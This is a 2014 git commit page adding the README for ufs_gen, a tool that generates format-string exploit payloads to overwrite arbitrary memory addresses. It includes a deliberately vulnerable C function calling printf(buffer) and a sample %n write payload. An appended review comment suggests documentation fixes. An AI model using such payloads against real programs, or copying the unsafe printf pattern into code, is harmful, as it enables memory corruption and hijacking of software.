author | Olivier Gayot <duskcoder@gmail.com> | 2014-01-26 15:05:01 +0000 |
---|---|---|
committer | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 00:10:11 +0000 |
commit | b3122c208b43e8dd775b49c5023f728e14e0156e (patch) | |
tree | d1fd0d48461e4afa7789fec4f8da5ee9c9f14d90 /README |
initial commit
Diffstat (limited to 'README')
-rw-r--r-- | README | 51 |
1 files changed, 51 insertions, 0 deletions
@@ -0,0 +1,51 @@ +ufs_gen +======= + +This software allows you to generate a payload which may override an address +with the value of your choice. + +The syntax is quite simple: + +There are three parameters needed for the program to run correctly. + +stackidx: this parameter specifies how many dwords you need to access the +beginning of your buffer (or payload). + +override: the address to override + +with: the value to inject at the address overriden + +This software is intended to work with an ELF32 generated by a typical code. + +example: + +int function(const char *payload) +{ + char buffer[BUFSIZ]; + + strncpy(buffer, payload, sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + printf(buffer); + + return 0; +} + +The support of ELF64 and other formats is intended but not written yet. +Although the option 'addrsize' might already be used to specify if an address +is not 4 bytes long, there is very few chances that it would work correctly. + +The support of printf(payload) directly (i.e. without a temporary buffer) is +also planned. + +Example +======= + +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 +D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n + +License +======= + +This software is free software covered by the GPL license v2. You should +read the COPYING file to understand what is implied. |
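Review bot: The parameter section says "There are three parameters needed" and lists only stackidx, override and with, yet the later paragraph refers to an 'addrsize' option that is never described. Add it to the list and mark it as experimental, since the text itself says it is unlikely to work correctly. In the Example section the sample output cannot be checked as printed: the payload begins with raw address bytes, and the 0x11 byte of each address is non-printable and absent from `D3"E3"F3"G3"`, so showing the output through a hex dump would make it verifiable. Next to the sample function, state explicitly that `printf(buffer)` is the defect being targeted and that `printf("%s", buffer)` is the corrected call, so the README also documents the fix. Wording: "overriden" should be "overridden", "override" reads better as "overwrite" throughout, and "there is very few chances" should be "there is very little chance".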